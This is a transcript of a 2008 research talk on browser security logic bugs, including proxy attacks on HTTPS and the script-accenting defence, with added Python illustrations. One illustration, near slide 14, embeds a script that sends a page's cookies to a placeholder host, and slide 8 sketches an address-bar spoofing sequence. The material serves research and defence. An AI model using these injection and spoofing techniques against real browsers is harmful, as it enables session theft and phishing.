1 Shuo Chen ISRC, MSR March 2008

2 Browser security is still very broad. I usually differentiate three types of issues; their causes and potential solutions are different.
Browser security issues:
- Logic bugs
- Usability and understandability issues
- Over-permissive high-level policies

3 Logic bugs exist at every layer in the browser architecture. (Everything you depend on is buggy.)
- GUI layer. E.g., logic bugs may result in visual spoofing.
- HTML and JScript layer. E.g., cross-domain access due to logic bugs in the domain isolation mechanism.
- Communication layer. E.g., logic bugs that allow any device that can sniff browser traffic to break the protection of HTTPS. (Our recent work "Pretty-Bad-Proxy".)

4 The violated security policies are fairly basic and look simple, e.g.:
- The address bar URL should be the URL of the top-level document.
- When the mouse hovers over a static hyperlink, the status bar should display the target URL.
- A script in the a.com context cannot access a document in the b.com context.
However, an important lesson I learned in browser security research is: implementing correct logic to achieve even the most basic security requirements in browsers is challenging. The challenges are likely to be understated if we haven't carefully studied these bugs.

5 Why is logic correctness challenging in browsers? A commodity browser is so complex that no human brain power can verify its correctness with high confidence. Most are tricky bugs; very few are "stupid" ones.

6 Even seemingly simple policies are difficult to securely enforce, due to logic complexity.


8
w1 = open("…");                                  // URL elided in the transcript
s1 = a string containing unprintable characters;
w1.location = "…";                               // URL elided in the transcript
w1.document.write("arbitrary contents!");
Navigate to the first URL; the frame is ready for the second URL; arbitrary contents are written to the frame. Navigation is not transactional, so it can be aborted in unsafe states. (Fixed in February 2008.)

9 c:\windows\system32\shdoclc.dll?http… (the remainder of the URL is elided in the transcript). History back versus load a new page: two frames competing, with a 50:50 chance to go out of sync with the address bar. Fixed before IE 7 was shipped.


11 Cryptographic protocols are designed to provide secure communications over insecure networks, e.g., HTTPS. Our curiosity: is the same adversary model rigorously considered when people deploy the protocols in browser/web systems? We assume the Pretty-Bad-Proxy adversary model: an HTTP proxy that completely controls unencrypted traffic, but cannot break the cryptography between the browser and the server.

12 Figure: the browser stack (HTML engine, which carries the browser security model, on top of SSL, on top of TCP/IP) talks to the server through the PBP (the bad guy). Encrypted traffic passes through the proxy; unencrypted traffic is accessible to the PBP, which can substitute faked data.

13 We found that a PBP can compromise HTTPS-deployed applications in many ways:
- Proxy's malicious error responses.
- Proxy redirecting JavaScript requests.
- Proxy loading HTTP JavaScript into an HTTPS context.
- Proxy making the browser display a cached certificate with bogus page contents.
- Proxy stealing HTTPS session cookies using HTTP requests.

14 <iframe src="…"> (the https URL is elided in the transcript). The proxy's error pages are rendered in the context of the target server. Figure: browser → PBP → server; instead of forwarding the request, the PBP answers it with its own "Server not found" error page.
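The exchange on slides 13 and 14, as an added example written for this page (it is not code from the talk or from any browser): the PBP answers the browser's CONNECT for an HTTPS site with an "error page" carrying script, and the two browser-side functions contrast the pre-fix behaviour (the page is rendered as if it came from the target) with what a browser must do instead. The last function covers the cookie-stealing bullet: a cookie set without the Secure attribute also travels over plain HTTP, which is what an injected http:// request to the same host exploits. Status code, markup, the host names and the "about:neterror" origin are all constructed for the example.

```python
import html
from dataclasses import dataclass


@dataclass
class ProxyResponse:
    """What the browser gets back from the proxy for a CONNECT request."""
    status: int
    headers: dict
    body: bytes


def pbp_handle_connect(request_line: str) -> ProxyResponse:
    """The PBP side: instead of answering 200 and opening the tunnel, reply with an
    'error page' that carries attacker script. The PBP never needs to touch TLS.
    (Status code, markup and the collection URL are constructed for this example.)"""
    host = request_line.split()[1].split(":")[0]   # "CONNECT mail.example.com:443 HTTP/1.1"
    body = (
        "<html><body><h1>Server not found</h1>"
        f"<p>Could not reach {html.escape(host)}.</p>"
        "<script>new Image().src='http://pbp.invalid/c?'+encodeURIComponent(document.cookie)</script>"
        "</body></html>"
    ).encode()
    return ProxyResponse(502, {"Content-Type": "text/html"}, body)


def browser_handle_connect_response(target_origin: str, resp: ProxyResponse, hardened: bool) -> dict:
    """The browser side.

    Pre-fix behaviour (slide 14): a non-200 answer to CONNECT is treated like any
    other error page and rendered in the origin of the site the user asked for, so
    the PBP's script runs as https://target, with that site's cookies and DOM.

    Hardened behaviour: a proxy's answer to CONNECT is never content from the target.
    Anything but 200 terminates the request, and whatever is shown gets a
    browser-controlled error origin (the name 'about:neterror' is an assumption)."""
    if resp.status == 200:
        return {"tunnel": True}                    # tunnel established; TLS follows
    if not hardened:
        return {"tunnel": False, "rendered_origin": target_origin, "body": resp.body}
    notice = f"The proxy refused the connection to {html.escape(target_origin)}".encode()
    return {"tunnel": False, "rendered_origin": "about:neterror", "body": notice}


def cookies_sent(jar: list, scheme: str) -> list:
    """Which cookie names leave the browser on a request over `scheme`.

    jar entries are (name, value, secure). A cookie set without the Secure attribute
    is sent over plain HTTP too; the PBP only has to inject or redirect to an
    http:// URL on the HTTPS site's host and read it off the clear-text request."""
    return [name for name, _value, secure in jar if scheme == "https" or not secure]


if __name__ == "__main__":
    resp = pbp_handle_connect("CONNECT mail.example.com:443 HTTP/1.1")
    for hardened in (False, True):
        print(hardened, browser_handle_connect_response("https://mail.example.com", resp, hardened))
    print(cookies_sent([("sid", "x", False), ("auth", "y", True)], "http"))
```

The hardened rule is the check to apply when reviewing any HTTP client that supports proxies: a response to CONNECT is the proxy talking, and its body must never inherit the requested site's origin. The cookie function is the reason "Secure" is not optional for session cookies of an HTTPS site.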

15
- When you stay in a hotel or in an Internet café.
- When you connect to a free wireless access point on a bus.
- When you use a third-party free anonymizer (an HTTP proxy).
- When the proxy of the corpnet is hacked by an insider or accidentally infected by a virus.
Don't trust HTTPS in these scenarios, although HTTPS is supposed to protect you against untrusted proxies.

16 It is turned on by default. You don't have to connect to an untrusted proxy intentionally; attackers can do that for you easily:
- Wireless access point (unencrypted or WEP).
- Sniffing on Ethernet.
A device that can sniff the traffic can break HTTPS communications. No security at all.

17 Microsoft has notified the other affected browser vendors (Firefox, Opera); they acknowledged the issues.
- Microsoft has fixed the IE bugs in IE 8 Beta 1, and is waiting to evaluate the compatibility impact before shipping patches for down-level IEs.
- Opera fixed their bugs in December.
- Firefox acknowledged these issues and plans to fix them.
We are waiting for the resolution of these issues before submitting the paper.


19 It is almost impossible for developers to anticipate the possibilities of security attacks, because:
- Tight interactions with other components, e.g., file system, XML, Flash, etc.
- Non-transactional: no guarantee of fail-safe.
- Concurrency: possibility of race conditions.
- Inter-page scripting is conditionally permitted.
- A platform rendering rich contents, e.g., HTML and JScript (compare to Telnet, FTP or SSH).

20 (1) Formal reasoning. If the code logic can be modeled and the high-level security specification can be formally defined, we can use formal methods to explore the logic combinations to prove or disprove the specification. We proposed this approach to reason about IE's GUI logic.
(2) Runtime enforcement of interface invariants. If the internal logic of a module is too complex to model, we enforce invariants of its interfaces. We proposed this approach to defeat cross-domain attacks.
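To make approach (1) concrete, here is an added toy (Python, written for this page; it is not the formal model used in the IE GUI-logic work) that models the non-transactional navigation bug of slide 8 as a tiny state machine and exhaustively explores it against the slide 4 policy "the address bar URL is the URL of the top-level document". The two origins, the event set and the split between a "transactional" and a "non-transactional" navigation model are all assumptions of the example.

```python
from collections import deque

# Two origins are enough to exhibit the bug: the attacker's page and the site it
# wants to impersonate (names constructed for this example).
ATTACKER, VICTIM = "attacker.example", "victim.example"

# State of the top-level frame: (address bar URL, origin of the displayed document,
# URL of the in-flight navigation or None).
INITIAL = (ATTACKER, ATTACKER, None)
EVENTS = [("start", ATTACKER), ("start", VICTIM), ("commit", None), ("abort", None)]


def step(state, event, transactional):
    """Apply one GUI event; return the successor state, or None if the event is not enabled."""
    addr, doc, pending = state
    kind, url = event
    if kind == "start" and pending is None:
        # Non-transactional (the slide-8 behaviour): the address bar shows the new URL
        # as soon as navigation starts. Transactional: nothing visible changes yet.
        return (addr if transactional else url, doc, url)
    if kind == "commit" and pending is not None:
        return (pending, pending, None)
    if kind == "abort" and pending is not None:
        # Non-transactional: the abort leaves the address bar as it was, i.e. showing
        # the aborted target, while the old document (and its scripts) is still there.
        return (doc if transactional else addr, doc, None)
    return None


def spec(state):
    """Slide 4 policy: when no navigation is pending, the address bar URL is the URL
    of the top-level document. In that idle state the old document's script can still
    document.write(), so a violation is exactly a spoofable frame."""
    addr, doc, pending = state
    return pending is not None or addr == doc


def find_spoof(transactional):
    """Breadth-first search of the reachable states; return the shortest event
    sequence that violates `spec`, or None if no reachable state violates it."""
    seen = {INITIAL}
    queue = deque([(INITIAL, [])])
    while queue:
        state, trace = queue.popleft()
        if not spec(state):
            return trace
        for event in EVENTS:
            nxt = step(state, event, transactional)
            if nxt is not None and nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, trace + [event]))
    return None


if __name__ == "__main__":
    print("non-transactional navigation:", find_spoof(transactional=False))
    print("transactional navigation:", find_spoof(transactional=True))
```

The search returns the two-step trace start(victim), abort for the non-transactional model, which is the slide 8 sequence, and nothing for the transactional one; the value of the approach is that the counterexample falls out of the exploration rather than out of someone's intuition about which interleavings matter.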

21 Goal: apply formal methods to reason about GUI logic in order to proactively uncover visual spoofing bugs. Examined the status bar logic and the address bar logic. Found 13 spoofing bugs; 11 of them were fixed before IE 7 was shipped.

22 In human languages, an accent is essentially an identifier of a person's origin that is carried in communications.
Script accenting:
- Each domain is associated with an "accent key".
- Scripts and HTML object names are encoded in their accented forms at the interface between the script engine and the HTML engine.
- Scripts won't be compiled and executed in a different domain, because of the accent mismatch.
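An added toy model of script accenting (Python, written for this page; it is not the IE implementation, which lives at the boundary between the JScript engine and the HTML engine): each domain gets an accent key, scripts and object names cross the interface only in accented form, and the script engine un-accents with the key of the context it is executing in. XOR with a per-domain random key, and `ast.parse` standing in for the script compiler, are assumptions made for the example.

```python
import ast
import secrets


class ScriptAccenting:
    """Toy model of script accenting. Each domain gets an accent key; scripts and HTML
    object names cross the script-engine/HTML-engine boundary only in accented form,
    and the receiving side un-accents with the key of the context it executes in.
    XOR with a per-domain random key is an assumption made for this example."""

    def __init__(self):
        self._keys = {}

    def key_for(self, domain: str) -> bytes:
        if domain not in self._keys:
            self._keys[domain] = secrets.token_bytes(32)
        return self._keys[domain]

    def set_key(self, domain: str, key: bytes) -> None:
        """Pin a key (used to make the demonstration deterministic)."""
        self._keys[domain] = bytes(key)

    @staticmethod
    def _xor(data: bytes, key: bytes) -> bytes:
        return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

    # --- HTML engine side -------------------------------------------------------
    def accent(self, origin_domain: str, text: str) -> bytes:
        """A script (or object name) originating from `origin_domain` leaves the
        HTML engine accented with that domain's key."""
        return self._xor(text.encode("ascii"), self.key_for(origin_domain))

    # --- script engine side -----------------------------------------------------
    def compile_in(self, context_domain: str, accented: bytes):
        """Un-accent with the key of the *executing* context and hand the result to
        the compiler. A mismatched accent yields bytes that are not even text, so the
        script cannot compile, let alone run, in the other domain. (`ast.parse`
        stands in for the JScript compiler.) Returns the source on success, else None."""
        raw = self._xor(accented, self.key_for(context_domain))
        try:
            source = raw.decode("ascii")
            ast.parse(source)
        except (UnicodeDecodeError, SyntaxError, ValueError):
            return None
        return source

    def resolve_name(self, context_domain: str, accented_name: bytes, objects: dict):
        """Object names are accented the same way: a name accented under a.com does
        not resolve to anything in b.com's object table."""
        raw = self._xor(accented_name, self.key_for(context_domain))
        try:
            return objects.get(raw.decode("ascii"))
        except UnicodeDecodeError:
            return None


if __name__ == "__main__":
    sa = ScriptAccenting()                      # random keys per domain
    blob = sa.accent("a.com", "leak = document.cookie\n")
    print("a.com context:", sa.compile_in("a.com", blob))
    print("b.com context:", sa.compile_in("b.com", blob))
```

The point of the construction is that it does not try to model the HTML engine's cross-domain logic at all; whatever bug lets an a.com script reach a b.com document, the script arrives in the wrong accent and the interface invariant holds regardless.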


24 Browser logic correctness is a critical component of web security. Because of the complexity, ensuring logic correctness is challenging: combinations of low-level behaviors violate high-level security policies.
Do not understate the challenges: security policies often look fairly simple, and it is difficult to see the challenges without in-depth investigation of real-world bugs.

25 New research opportunities: more effort should be spent simply to understand logic bugs better, and to propose solutions based on that understanding. It's fun to probe the logic and piece together your knowledge; try to do something that most people thought impossible …

26 Collaborators:
- Ziqing Mao (Purdue, Security, Intern)
- Jose Meseguer (UIUC, formal methods)
- David Ross (MS, Security Tech Unit)
- Ralf Sasse (UIUC, formal methods, Intern)
- Helen J. Wang (MSR, Security)
- Yi-Min Wang (MSR, Internet Services)
- Ming Zhang (MSR, Networking)